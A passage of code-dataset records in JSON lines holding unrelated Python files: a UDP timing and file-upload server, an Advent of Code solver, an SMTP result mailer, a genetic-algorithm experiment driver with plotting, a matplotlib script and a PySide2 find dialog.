caracter not in vocales:\n emp_conso = True\n\n elif clet >= 3:\n if car_ant == 'l' and caracter == 'i':\n tiene_li = True\n\n car_ant = caracter\n\nif cpal > 0:\n print('Hay', cpecv, ' palabras en el texto que empiezan con consonante '\n 'y terminan con vocal')\n print('Hay', palabras_li, 'palabras en el texto que poseen la secuenci '\n '\"li\" a partir de la tercer letra')\n por = palabras_menos_4 * 100 / cpal\n print('Hay', palabras_menos_4, 'palabras en el texto con menos de 4 '\n 'letras y representan el', por,\n '% de palabras del texto')\nelse:\n print('No se ha ingresado un texto para analizar')","sub_path":"Guía de Ejercicios Practicos/Guia de Ejercicios Prácticos-Ficha 08/Ej5-ProcesamientodeTexto.py","file_name":"Ej5-ProcesamientodeTexto.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"443225070","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport json\nimport base64\nimport socket\nimport hashlib\nimport asyncio\nimport argparse\nimport datetime\nimport numpy as np\nimport os.path as osp\nimport dateutil.parser as dateparser\n\nif sys.version_info < (3, 6):\n import sha3\n\nparser = argparse.ArgumentParser(\n description='Simple lightweight UDP server')\nparser.add_argument('--port',\n default=10000,\n help=\"UDP port to be listened\")\nparser.add_argument('--bufsize',\n default=212992,\n help=\"Size of input buffer\")\n\nLOGGING_PATH = 'logs'\nUPLOADS_FOLDER = 'uploads'\n# events = []\n\nevents = {}\nfile_uploads = {}\n\n\ndef generate_report(addr):\n event = events.pop(addr)\n now = datetime.datetime.now()\n diff = now - event['initial_time']\n seqs = sorted(event['seqs'], key=lambda x: x[-1])\n # print(seqs)\n print(\"Time elapsed: %gs\" % (diff.microseconds / 1e6))\n filename = '_'.join([str(i) for i in addr] + [now.isoformat()]) + '.log'\n lines = ['seq_num,elapsed_time']\n values = []\n for seq in seqs:\n num_seq, send_time, arrival_time = seq\n time_delta = arrival_time - send_time\n values.append([int(num_seq), time_delta.microseconds / 1e6])\n lines.append(','.join([str(num_seq),\n str(time_delta.microseconds / 1e6)]))\n values = np.array(values)\n mean = np.mean(values[:, 1])\n lines.append('Mean Reception Time: %g' % (mean))\n lines.append('Lost Objects: %d' % (event['num_messages'] -\n values.shape[0]))\n lines.append('Total Objects: %d' % (event['num_messages']))\n lines = '\\n'.join(lines)\n with open(osp.join(LOGGING_PATH, filename), 'w') as fp:\n fp.write(lines)\n\n\nclass EchoServerProtocol:\n def connection_made(self, transport):\n self.transport = transport\n # print(self.transport.get_extra_info('socket'))\n print(bufsize)\n sock = self.transport.get_extra_info('socket')\n sock.settimeout(5.0)\n # snd_bufsize = sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)\n # print(snd_bufsize)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)\n\n def datagram_received(self, data, addr):\n now = datetime.datetime.now()\n message = data.decode()\n # print(message)\n data = json.loads(message)\n\n if data['type'] == 'MSG':\n self.handle_msg(data, addr, now)\n elif data['type'] == 'FILE':\n self.handle_upload(data, addr)\n elif data['type'] == 'MD5':\n self.handle_digest(data, addr)\n\n def handle_msg(self, data, addr, now):\n total_seq = data['total_messages']\n timestamp = data['timestamp']\n seq = data['sequence_num']\n message = data['message']\n if addr not in events:\n events[addr] = {'num_messages': int(total_seq), 'seqs': [],\n 'initial_time': now}\n timestamp = dateparser.parse(timestamp)\n diff = now - timestamp\n print(diff.microseconds / 1000)\n events[addr]['seqs'].append([seq, timestamp, now])\n print('Received %r from %s - %s' % (message, addr,\n datetime.datetime.now()))\n if events[addr]['num_messages'] == int(seq):\n generate_report(addr)\n\n def handle_upload(self, data, addr):\n print(data['seq_num'])\n if addr not in file_uploads:\n file_uploads[addr] = {'num_seqs': data['total_seq'], 'chunks': [],\n 'filename': osp.join(UPLOADS_FOLDER,\n data['file']),\n 'seg_write': 0,\n 'md5sum': hashlib.sha3_256()}\n chunk = base64.b64decode(bytes(data['payload'], 'utf-8'))\n file_uploads[addr]['chunks'].append([data['seq_num'], chunk])\n file_uploads[addr]['chunks'] = sorted(file_uploads[addr]['chunks'],\n key=lambda x: x[0])\n self.write_to_file(addr)\n self.transport.sendto(b'ACK', addr)\n\n def write_to_file(self, addr):\n data = file_uploads[addr]\n last_seg = data['seg_write']\n i = 0\n cur_seg = data['chunks'][i][0]\n with open(data['filename'], 'ab') as fp:\n while cur_seg == last_seg + 1:\n data['md5sum'].update(data['chunks'][i][1])\n fp.write(data['chunks'][i][1])\n i += 1\n last_seg = cur_seg\n try:\n cur_seg = data['chunks'][i][0]\n except IndexError:\n break\n # last_seg, cur_seg = cur_seg, cur_seg + 1\n data['chunks'] = data['chunks'][cur_seg + 1:]\n data['seg_write'] = last_seg\n\n def handle_digest(self, data, addr):\n print(data)\n print(file_uploads[addr]['seg_write'])\n md5sum = self.flush_chunks(addr)\n print(md5sum)\n self.transport.sendto(bytes(md5sum == data['payload']), addr)\n\n def flush_chunks(self, addr):\n data = file_uploads[addr]\n with open(data['filename'], 'ab') as fp:\n for chunk in data['chunks']:\n data['md5sum'].update(chunk[1])\n fp.write(chunk[1])\n md5sum = data['md5sum'].hexdigest()\n file_uploads.pop(addr)\n return md5sum\n\n\nif __name__ == '__main__':\n try:\n os.mkdir(LOGGING_PATH)\n except Exception:\n pass\n\n try:\n os.mkdir(UPLOADS_FOLDER)\n except Exception:\n pass\n\n args = parser.parse_args()\n HOST, PORT = '0.0.0.0', int(args.port)\n bufsize = int(args.bufsize)\n loop = asyncio.get_event_loop()\n print(\"Starting UDP server\")\n # One protocol instance will be created to serve all client requests\n listen = loop.create_datagram_endpoint(\n EchoServerProtocol, local_addr=(HOST, PORT))\n # tasks = [loop.create_task(generate_report())]\n print(\"Now listening on %s:%d\" % (HOST, PORT))\n print(\"Press Ctrl+C to Stop\")\n transport, protocol = loop.run_until_complete(listen)\n\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n # print(events)\n for addr in events:\n generate_report(addr)\n transport.close()\n loop.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456629993","text":"from functools import partial, reduce\nfrom itertools import combinations, filterfalse, tee\nfrom operator import add\n\nweapon_shop = [\n (\"Dagger\", {'cost': 8, 'damage': 4, 'armor': 0}),\n (\"Shortsword\", {'cost': 10, 'damage': 5, 'armor': 0}),\n (\"Warhammer\", {'cost': 25, 'damage': 6, 'armor': 0}),\n (\"Longsword\", {'cost': 40, 'damage': 7, 'armor': 0}),\n (\"Greataxe\", {'cost': 74, 'damage': 8, 'armor': 0}),\n]\n\narmor_shop = [\n (\"Leather\", {'cost': 13, 'damage': 0, 'armor': 1}),\n (\"Chainmail\", {'cost': 31, 'damage': 0, 'armor': 2}),\n (\"Splintmail\", {'cost': 53, 'damage': 0, 'armor': 3}),\n (\"Bandedmail\", {'cost': 75, 'damage': 0, 'armor': 4}),\n (\"Platemail\", {'cost': 102, 'damage': 0, 'armor': 5}),\n]\n\nring_shop = [\n (\"Damage +1\", {'cost': 25, 'damage': 1, 'armor': 0}),\n (\"Damage +2\", {'cost': 50, 'damage': 2, 'armor': 0}),\n (\"Damage +3\", {'cost': 100, 'damage': 3, 'armor': 0}),\n (\"Defense +1\", {'cost': 20, 'damage': 0, 'armor': 1}),\n (\"Defense +2\", {'cost': 40, 'damage': 0, 'armor': 2}),\n (\"Defense +3\", {'cost': 80, 'damage': 0, 'armor': 3}),\n (\"None\", {'cost': 0, 'damage': 0, 'armor': 0}),\n]\n\ndef mergewith(f, a, b):\n merged = {k: a.get(k, b.get(k)) for k in a.keys() ^ b.keys()}\n merged.update({k: f(a[k], b[k]) for k in a.keys() & b.keys()})\n return merged\n\ndef all_equipment_combos():\n for _, weapon in weapon_shop:\n for _, armor in armor_shop:\n for combo in combinations((x[1] for x in ring_shop), 2):\n for rings in [mergewith(add, *combo), combo[1]]:\n yield {**reduce(partial(mergewith, add), [weapon, armor, rings]), 'hp': 100}\n\ndef is_winning(b, p):\n def ttd(p1, p2):\n q, r = divmod(p1['hp'], max(1, (p2['damage'] - p1['armor'])))\n return q if r == 0 else q + 1\n return ttd(p, b) >= ttd(b, p)\n\ndef partition(pred, iterable):\n t1, t2 = tee(iterable)\n return filter(pred, t1), filterfalse(pred, t2)\n\ndef all_battles(boss):\n return partition(partial(is_winning, boss), all_equipment_combos())\n\ndef parse_boss(s):\n hp, dmg, ar = [int(x.split()[-1]) for x in s.split('\\n')]\n return {'hp': hp, 'damage': dmg, 'armor': ar, 'cost': 0}\n\ndef part1(s):\n return min(x['cost'] for x in all_battles(parse_boss(s))[0])\n\ndef part2(s):\n return max(x['cost'] for x in all_battles(parse_boss(s))[1])\n","sub_path":"year2015/day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"120705489","text":"# -*- coding: utf-8 -*-\n\n#Python 3.5.x\n\n#V0.01\nimport os\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nfrom email.mime.application import MIMEApplication\n\nimport json\nimport datetime\nimport time\n\nimport config\n\n__metaclass__ = type\n\n\nclass MySendMail():\n def sendRes_ByMail(self, plain_msg, attachFiles):\n \n temp_email_info = json.loads(config.decryptInfo(config.email_info, config.cryptoKey))\n \n # 第三方 SMTP 服务\n mail_host=temp_email_info['mail_host'] #设置服务器\n mail_port=temp_email_info['mail_port'] #设置服务器\n mail_user=temp_email_info['mail_user'] #用户名\n mail_pass=temp_email_info['mail_pass'] #口令\n sender = temp_email_info['sender']\n receivers = temp_email_info['receivers'].split(',') # 接收邮件,可设置为你的QQ邮箱或者其他邮箱\n \n for receiver in receivers:\n message = MIMEMultipart()\n message['From'] = Header(sender, 'utf-8')\n message['To'] = Header(';'.join([receiver]), 'utf-8')\n subject = 'Tipster Result('+str(datetime.datetime.now())+')'\n message['Subject'] = Header(subject, 'utf-8')\n \n #正文的纯文本部分\n puretext = MIMEText(plain_msg, 'plain', 'utf-8')\n message.attach(puretext)\n \n #增加文件附件\n for attachFile in attachFiles:\n filepart=MIMEApplication(open(attachFile, 'rb').read())\n filepart.add_header('Content-Disposition', 'attachment', filename=os.path.basename(attachFile))\n message.attach(filepart)\n \n \n try:\n smtpObj = smtplib.SMTP_SSL() \n smtpObj.connect(mail_host, mail_port) # 25 为 SMTP 端口号\n smtpObj.login(mail_user,mail_pass) \n smtpObj.sendmail(sender, [receiver], message.as_string())\n print(\"邮件发送成功\" % receiver)\n except Exception as err:\n print (err)\n print(\"Error: 无法发送邮件\" % receiver)\n \n time.sleep(30)\n \n \n","sub_path":"source/info_output/sendMail.py","file_name":"sendMail.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"221551221","text":"# -*- coding: utf-8 -*-\n\nimport subprocess\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#[理论]求最小值问题FDC趋近于-1,则问题难度较大,趋近于1时难度较小;求最大问题则相反\n\n#坐标轴名称词典\n#1)可变参数名称 -->坐标轴名称映射\n#2)其它名称映射,例如一些自定义数据(最优适应度,平均适应度等)\n#注1:只有可变参数1)才能用于RunVNR函数中的name参数!!!\n#注2:如果将来需要坐标轴的文字显示中文,直接修改axisNames的内容即可\naxisNames = {\n #1)可变参数名称(从globalParams词典中提出来的)\n 'popSize':'Population Size',\n 'maxGen':'Max Generation',\n 'steadyGen':'Steday Generation',\n 'pCross':'Crossover Rate',\n 'pMut':'Mutate Rate',\n #其它可变参数后续考察后再添加\n #...\n\n #2)其它名称映射\n 'generation':'Generation',\n 'best_fitness':'Best Fitness',\n 'average_fitness':'Average Fitness',\n 'stdev_fitness':'Stdev Fitness',\n 'fdc_fitness':'Fitness Distance Correlation',\n 'svr':'Variance of R',\n\n #3)并行计算配置文件\n 'schema':'PEO Schema XML File',\n 'dataFile':'Data File'\n}\n\n#全局进化参数(默认进化参数)词典\nglobalParams = {\n #不打印帮助信息\n 'help':0,\n\n #种群个数\n 'popSize':20,\n\n #7种选择策略\n #如果是求最小优化问题,不能使用轮盘赌选择(Roulette)\n #通风系统阻力系数反演问题(VNR)是最小优化问题\n # 1) DetTour -- 竞赛选择[2, posSize/2]\n 'tsize':2,\n # 2) StochTour -- 随机竞赛选择[0.5, 1]\n 'trate':1.0,\n # 3) Ranking i -- 排序选择\n # (a)Ranking选择参数: 选择压力(1,2]\n 'pressure':2.0,\n # (b)Ranking选择参数: 指数(0,+inf)\n 'exponent':1.0,\n # 4) Sequential(ordered) 顺序选择(将种群的个体排序后依次进行选择)\n # 5) Sequential(unordered) 乱序选择(将种群的个体打乱后依次进行选择)\n # 6) Roulette -- 轮盘赌选择\n # 7) Random -- 随机选择\n #选择策略(使用序号[1,7]表示使用哪一个选择策略)\n #默认使用DetTour\n 'selection':2,\n\n #这3个选项很少用到,保持默认值即可\n #是否统计适应度函数的计算次数\n 'useEval':0,\n #是否统计适应度函数的计算时间\n 'useTime':0,\n #控制台打印适应度统计数据(最优,平均,方差,FDC)\n #注:修改了EO源代码,因此fileBestStat参数可以记录FDC数据了\n 'printBestStat':0,\n\n #序列化路径\n 'resDir':'Res',\n #是否清空文件夹(${resDir})\n 'eraseDir':1,\n #序列化记录适应度统计数据(最优,平均,方差,FDC)\n #注:修改了EO源代码,因此fileBestStat参数可以记录FDC数据了\n 'fileBestStat':1,\n\n #废除!!!\n #暂时不需要自定义,因为可以直接在EO的源代码中进行修改\n ##序列化记录FDC统计数据\n #'fileFDCStat':1,\n ##FDC(Fitness Distance Correlation,适应度-距离相关系数)\n ##FDC需要一种计算距离的方法,目前有3种计算距离方法:\n ##1) QuadDistance -- 欧拉距离(两个染色体每个变量差值的平方和,最后开平方)\n ##2) HammingDistance -- 汉明距离(两个染色体每个变量差值的绝对值总和)\n ##3) FitnessDistance -- 适应度距离(两个染色体的适应度差值的绝对值)\n #fdcDist = 1\n\n #保存种群信息的频率(每隔多少代)\n #由resDir参数指定保存路径\n #文件名:generation1.sav generation20.sav generation40.sav generation100.sav 等等\n #-1 -- 表示不记录\n # 0 -- 表示只记录最后一代\n # n -- 表示每隔n代记录一次\n 'saveFrequency':0,\n\n #最大进化代数\n 'maxGen':200,\n #稳定进化代数(种群最优个体的适应度多少代没有明显改进即停止进化)\n 'steadyGen':100,\n\n #交叉率\n 'pCross':0.6,\n #变异率\n 'pMut':0.1,\n\n #3个实数编码交叉算子\n #alpha变量暂时不明白是什么意思,用于2个代数交叉算子(SegmentCrossOver 和 HypercubeCrossOver)\n #alpha -- [0,1]\n 'alpha':0.0,\n #1) SegmentCrossOver\n 'segmentRate':1,\n #2) HypercubeCrossOver\n 'hypercubeRate':1,\n #3) 作用机理类似均匀变异的交叉算子\n 'uxoverRate':1,\n\n #3个实数编码变异算子\n #epsilon参数用于uniformMut和detMut\n 'epsilon':0.001,\n #1) UniformMutator\n 'uniformMutRate':1,\n #2) DetMutator\n 'detMutRate':1,\n #3) 高斯变异(正态分布变异)\n 'normalMutRate':1,\n #sigma和pNormal是高斯变异的2个参数\n 'sigma':0.3,\n 'pNormal':1.0,\n \n #并行参数及数据文件\n 'schema':'vnr_schema.xml',\n 'dataFile':'vnr_data.txt',\n 'debug':False\n}\n\n#这些参数并不需要写入到vnr程序中\n#它们都是作为其它参数的变量使用的\n#例如: --selection=DetTour(tsize)\nnotActualParamNames = [\n 'tsize',\n 'trate',\n 'pressure',\n 'exponent',\n]\n\ndef GetParamValue(key, cmdParams):\n value = globalParams[key]\n if key in cmdParams.keys():\n value = cmdParams[key]\n return value\n\ndef SelectionStr(sel, cmdParams):\n if sel == 1:\n return 'DetTour({0})'.format(GetParamValue('tsize',cmdParams))\n elif sel == 2:\n return 'StochTour({0})'.format(GetParamValue('trate',cmdParams))\n elif sel == 3:\n return 'Ranking({0},{1})'.format(GetParamValue('pressure',cmdParams),GetParamValue('exponent',cmdParams))\n elif sel == 4:\n return 'Sequential({0})'.format('ordered')\n elif sel == 5:\n return 'Sequential({0})'.format('unordered')\n elif sel == 6:\n return 'Roulette'\n elif sel == 7:\n return 'Random'\n\ndef SaveFrequencyStr(freq, cmdParams):\n if freq < 0 or freq > GetParamValue('maxGen',cmdParams):\n return '0'\n else:\n return str(freq)\n\ndef MakeCmdParams(cmdParams):\n paramList=[]\n for k, v in cmdParams.iteritems():\n if k in globalParams.keys():\n if k in notActualParamNames:\n continue\n elif k == 'selection':\n paramList.append('--{0}={1}'.format(k, SelectionStr(v,cmdParams)))\n elif k == 'saveFrequency':\n #默认不保存种群信息,注释掉即可\n paramList.append('#--{0}={1}'.format(k, SaveFrequencyStr(v,cmdParams)))\n else:\n paramList.append('--{0}={1}'.format(k, v))\n return paramList\n\ndef MakeGlobalParams(filename):\n #新建文件\n f = open(filename, 'w')\n #生成参数列表,大概形式:['--maxGen=200', '--steadyGen=100', '--pCross=0.6', ... ]\n paramList = MakeCmdParams(globalParams)\n #换行写入到文件中\n f.write('\\n'.join(paramList))\n f.write('\\n')\n f.close()\n\ndef BuildVNRArgs(exe, paramFile, cmdParams, name, data):\n argsList = []\n #exe可能是多个参数构成,需要拆分\n #比如: mpiexec -host node1 -np 5 ./vnr_mpi \n args = []\n args.extend(exe.split(' '))\n args.append('@'+paramFile)\n args.extend(MakeCmdParams(cmdParams))\n if name in axisNames.keys() and len(data) > 2:\n args.extend(['dummy'])\n for value in data:\n #构造一个词典{k:v},然后使用MakeCmdParams生成参数字符串列表\n #取列表的第1个作为参数(实际上列表也只有一个元素)\n args[-1]=MakeCmdParams({name:value})[0]\n argsList.append(';'.join(args))\n else:\n argsList.append(';'.join(args))\n return argsList\n\n#连续多次执行vnr\n#exe -- vnr程序\n#paramFile -- 参数文件\n#cmdParams -- 命令行输入的参数(字典数据结构)\n#注:目前尚未考虑并行执行vnr\ndef RunVNR(exe, paramFile, cmdParams, name, data, stats):\n #生成参数文件\n MakeGlobalParams(paramFile)\n\n #1)构造动态参数\n argsList = BuildVNRArgs(exe, paramFile, cmdParams, name, data)\n for args in argsList:\n # 2)传入参数并调用外部命令\n child = subprocess.Popen(args.split(';'))\n child.wait()\n # 3) 收集进化计算的统计数据\n # stat是一个类对象,必须包含一个getDatas(cmdParams)方法\n for statObj in stats:\n statObj.statDatas(cmdParams)\n\n#暂时不处理matplotlib的中文显示问题\n#修正该问题需要指定linux系统的中文字体\n#import matplotlib as mpl\n#mpl.rcParams('font.sans-serif']=['SimSun']\n\n#从best_xg文件中读取数据(默认路径:当前路径下的Res/best.xg)\n#数据格式:\n#如果useTime == 0 (6个数据)\n#进化代数 适应度计算次数 最优适应值 平均适应值 适应值方差 适应度-距离相关性系数(FDC)\n#如果useTime == 1 (7个数据)\n#进化代数 适应度计算次数 进化计算耗费时间 最优适应值 平均适应值 适应值方差 适应度-距离相关性系数(FDC)\n#注:修改了EO源代码,因此fileBestStat参数可以记录FDC数据了;否则数据个数应该减去1(即没有最后的FDC数据)\ndef GetBestXgDatas(best_xg, useTime):\n gen = []\n best = []\n average = []\n stdev =[]\n fdc = []\n f = open(best_xg, 'r')\n for line in f:\n data = line.split()\n #保证每一行有6个数据\n #如果记录每一代的进化时间,则是7个数据\n #注:修改了EO源代码,因此fileBestStat参数可以记录FDC数据了;否则数据个数应该减去1\n best_count = 6\n #最优适应度数据索引位置\n best_start = 2\n if useTime == 1:\n best_count = best_count + 1\n best_start = best_start + 1\n if len(data) != best_count:\n continue\n #进化代数\n gen.append(int(data[0]))\n #最优\n best.append(float(data[best_start]))\n #平均\n average.append(float(data[best_start+1]))\n #方差\n stdev.append(float(data[best_start+2]))\n #FDC\n fdc.append(float(data[best_start+3]))\n f.close()\n return gen, best, average, stdev, fdc\n\n#从vnr_xg文件中读取数据(默认路径:当前路径下的Res/vnr.xg)\n#数据格式:\n#进化代数 目标值 最优适应值\ndef GetVnrXgDatas(vnr_xg):\n gen = []\n best = []\n svr = []\n f = open(vnr_xg, 'r')\n for line in f:\n data = line.split()\n if len(data) != 3:\n continue\n #进化代数\n gen.append(int(data[0]))\n #最优\n best.append(float(data[1]))\n #风阻均方差\n svr.append(float(data[2]))\n f.close()\n return gen, best, svr\n\n#适应值统计数据类\n#如果是连续运行,只收集最后一代的数据\n#如果是运行一次,则收集所有的数据\n#从best.xg文件中读取数据,包括进��代数,最优适应值,平均适应值,适应值方差,FDC\n#[注意]: 必须包含statDatas(self, cmdParams)函数的定义\nclass FitnessStat:\n def __init__(self, bContinuousRun):\n #进化代数\n self.gen = []\n #每一代种群的最优个体适应度\n self.best = []\n #每一代种群的平均适应度\n self.average = []\n #每一代种群的适应度方差\n self.stdev = []\n #每一代种群的适应度-距离相关性系数(FDC)\n self.fdc = []\n #是否连续运行\n #如果是连续运行,则只收集每一次进化计算的最后一代的数据\n self.bContinuousRun = bContinuousRun\n\n def statDatas(self, cmdParams):\n #[必要条件]fileBestStat必须等于1\n #否则best.xg和vnr.xg没有数据\n\n #适应度统计数据文件路径\n best_xg = GetParamValue('resDir',cmdParams)+'/best.xg'\n #是否记录了每一代的进化时间\n useTime = GetParamValue('useTime',cmdParams)\n if self.bContinuousRun:\n #连续运行vnr,则只取最后一代的数据\n cgen, cbest, caverage, cstdev, cfdc = GetBestXgDatas(best_xg, useTime)\n self.gen.append(cgen[-1])\n self.best.append(cbest[-1])\n self.average.append(caverage[-1])\n self.stdev.append(cstdev[-1])\n self.fdc.append(cfdc[-1])\n else:\n #收集进化计算的数据\n self.gen, self.best, self.average, self.stdev, self.fdc = GetBestXgDatas(best_xg, useTime)\n\n def getNames(self):\n return [\n axisNames['generation'],\n axisNames['best_fitness'],\n axisNames['average_fitness'],\n axisNames['stdev_fitness'],\n axisNames['fdc_fitness']\n ]\n\n def getDatas(self):\n return [self.gen, self.best, self.average, self.stdev, self.fdc]\n\n#风阻均方差统计数据类\n#从vnr.xg文件中读取数据,包括进化代数,最优适应值,风阻均方差\n#[注意]: 必须包含statDatas(self, cmdParams)函数的定义\nclass VnrStat:\n def __init__(self, bContinuousRun):\n #进化代数\n self.gen = []\n #每一代种群的最优个体适应度\n self.best = []\n #实际风阻与原始风阻的均方差\n self.svr= []\n #是否连续运行\n #如果是连续运行,则只收集每一次进化计算的最后一代的数据\n self.bContinuousRun = bContinuousRun\n\n def statDatas(self, cmdParams):\n #[必要条件]fileBestStat必须等于1\n #否则best.xg和vnr.xg没有数据\n\n #清空数据\n #self.gen[:]=[]\n #self.best[:]=[]\n #self.svr[:]=[]\n\n #数据文件路径\n vnr_xg = GetParamValue('resDir',cmdParams)+'/vnr.xg'\n if self.bContinuousRun:\n #连续运行vnr,则只取最后一代的数据\n cgen, cbest, csvr = GetVnrXgDatas(vnr_xg)\n self.gen.append(cgen[-1])\n self.best.append(cbest[-1])\n self.svr.append(csvr[-1])\n else:\n #收集进化计算的数据\n self.gen, self.best, self.svr = GetVnrXgDatas(vnr_xg)\n\n def getNames(self):\n return [\n axisNames['generation'],\n axisNames['best_fitness'],\n axisNames['svr']\n ]\n\n def getDatas(self):\n return [self.gen, self.best, self.svr]\n\n#图形行列布局,视图形的个数而定\n#例如2*2 , 3*3, 4*4, 4*3等等\ndef CaclPlotRowColNum(n):\n if n == 1:\n #1*1\n return 111\n elif n == 2:\n #2*1\n return 211\n elif n == 3:\n #3*1\n return 311\n elif n == 4:\n #2*2\n return 221\n elif n == 5:\n #3*2\n return 321\n elif n == 6:\n #3*2\n return 321\n elif n == 7:\n #4*2\n return 241\n elif n == 8:\n #4*2\n return 421\n elif n == 9:\n #3*3\n return 331\n else:\n #3*3\n return 331\n\n#通用绘制函数\n#数据格式:\n# names=['Generation', 'Best']\n# datas=[[1,2,3,4], [1.2, 3, 5.6, 4.8]]\n# 如果bPlotInOne == False,则一个Figure里包含多个subplot,每个subplot绘制一条曲线\n# 如果bPlotInOne == True,则一个Figure里只有一个subplot,所有的曲线都绘制在一个subplot里\ndef Plot(names, datas, bPlotInOne):\n if len(names) < 2 or len(datas) < 2 or len(names) != len(datas):\n return\n\n #提取X轴数据\n xname = names[0]\n xdata = datas[0]\n\n #计算plot的起始编号\n plotNum = CaclPlotRowColNum(len(names)-1)\n\n #提取Y轴数据并绘制曲线\n for yname, ydata in zip(names, datas):\n if yname == xname:\n continue\n\n if not bPlotInOne:\n plt.subplot(plotNum)\n plotNum = plotNum + 1\n\n plt.plot(xdata, ydata)\n plt.xlabel(xname)\n\n if not bPlotInOne:\n plt.ylabel(yname)\n else:\n n = len(xdata)/2\n plt.text(xdata[n], ydata[n], yname)\n\n #plt.title('G-B Figure')\n #plt.axes(40,160,0,0.3)\n plt.grid(True)\n\ndef buildMpiExeName(hosts, np, exe):\n exes = ['mpiexec', '-hosts']\n exes.append(','.join(hosts))\n exes.append('-np')\n exes.append(str(np))\n exes.append(exe)\n return ' '.join(exes)\n\ndef GetExeName(hosts=[], np=2):\n if len(hosts) == 0 or np < 2:\n return './vnr'\n else:\n return buildMpiExeName(hosts, np, './vnr_mpi')\n\n\ndef GetDataFile():\n return \"vnr_data.txt\"\n\ndef GetParamFile():\n return \"vnr.param\"\n\ndef GetSchema():\n return 'vnr_schema.xml'\n","sub_path":"test/vnr_py/vnr.py","file_name":"vnr.py","file_ext":"py","file_size_in_byte":16265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"434027370","text":"import matplotlib.pyplot as plt\nimport glob\nimport csv\n\nFILES_LIST = ['rsel.csv', 'cel-rs.csv', '2cel-rs.csv', 'cel.csv', '2cel.csv']\nHEURISTICS_LIST = ['1-Evol-RS', '1-Coev-RS', '2-Coev-RS', '1-Coev', '2-Coev']\n\ndef str_to_float(string):\n\ttry:\n\t\tstring = float(string)\n\texcept ValueError:\n\t\tpass\n\treturn string\n\n\ndef read_file(filename):\n\tarr = []\n\twith open(filename, newline='') as csvfile:\n\t\thandler = csv.reader(csvfile, delimiter=',')\n\t\tfor row in handler:\n\t\t\tarr.append(row)\t\n\treturn arr\t\n\n\ndef prepare_array(arr):\n\tnew_arr = []\n\tfor row in arr:\n\t\ttemp = []\n\t\tfor cell in row:\n\t\t\ttemp.append(str_to_float(cell))\n\t\tnew_arr.append(temp)\n\treturn new_arr\n\n\ndef prepare_plot(arr, heuristic):\n\tx, y = [], []\n\tfor row in arr[1:]:\n\t\tx.append(row[1])\n\t\ty.append(sum(row[2:]) / float(len(row[2:])))\n\tplt.plot(x, y, label=heuristic)\n\n\ndef draw_plot():\n\tplt.xlabel('Rozegranych gier')\n\tplt.ylabel('Odsetek wygranych gier')\n\tplt.legend(loc=4)\n\tplt.xlim([0,500000])\n\tplt.show()\n\n\ndef main():\n\tfor i in range(len(FILES_LIST)):\n\t\tprepare_plot(prepare_array(read_file(FILES_LIST[i])), HEURISTICS_LIST[i])\n\tdraw_plot()\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"Plots/plot1.py","file_name":"plot1.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16036801","text":"#!/usr/bin/env python3\n# -*-coding:utf-8-*-\n\nfrom PySide2.QtWidgets import QDialog, QLabel, QLineEdit, QCheckBox, \\\n QPushButton, QHBoxLayout, QVBoxLayout, QApplication\nfrom PySide2.QtCore import Qt, Signal, Slot\n\n\nclass FindDialog(QDialog):\n findNext = Signal(str, Qt.CaseSensitivity)\n findPrevious = Signal(str, Qt.CaseSensitivity)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n label = QLabel(\"Find &what:\")\n self.lineEdit = QLineEdit()\n label.setBuddy(self.lineEdit)\n\n self.caseCheckBox = QCheckBox(\"Match &case\")\n self.backwardCheckBox = QCheckBox(\"Search &backward\")\n self.findButton = QPushButton(\"&Find\")\n self.findButton.setDefault(True)\n self.findButton.setEnabled(False)\n closeButton = QPushButton(\"Close\")\n\n self.lineEdit.textChanged.connect(self.enableFindButton)\n self.findButton.clicked.connect(self.findClicked)\n closeButton.clicked.connect(self.close)\n\n topLeftLayout = QHBoxLayout()\n topLeftLayout.addWidget(label)\n topLeftLayout.addWidget(self.lineEdit)\n leftLayout = QVBoxLayout()\n leftLayout.addLayout(topLeftLayout)\n leftLayout.addWidget(self.caseCheckBox)\n leftLayout.addWidget(self.backwardCheckBox)\n rightLayout = QVBoxLayout()\n rightLayout.addWidget(self.findButton)\n rightLayout.addWidget(closeButton)\n rightLayout.addStretch()\n mainLayout = QHBoxLayout()\n mainLayout.addLayout(leftLayout)\n mainLayout.addLayout(rightLayout)\n self.setLayout(mainLayout)\n\n self.setWindowTitle(\"Find\")\n self.setFixedHeight(self.sizeHint().height())\n\n def enableFindButton(self, text):\n self.findButton.setEnabled(bool(text))\n\n @Slot()\n def findClicked(self):\n text = self.lineEdit.text()\n if self.caseCheckBox.isChecked():\n cs = Qt.CaseSensitive\n else:\n cs = Qt.CaseInsensitive\n\n if self.backwardCheckBox.isChecked():\n self.findPrevious.emit(text, cs)\n else:\n self.findNext.emit(text, cs)\n\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n findDialog = FindDialog()\n\n\n def find(text, cs):\n print('find:', text, 'cs', cs)\n\n\n def findp(text, cs):\n print('findp:', text, 'cs', cs)\n\n\n findDialog.findNext.connect(find)\n findDialog.findPrevious.connect(findp)\n findDialog.show()\n 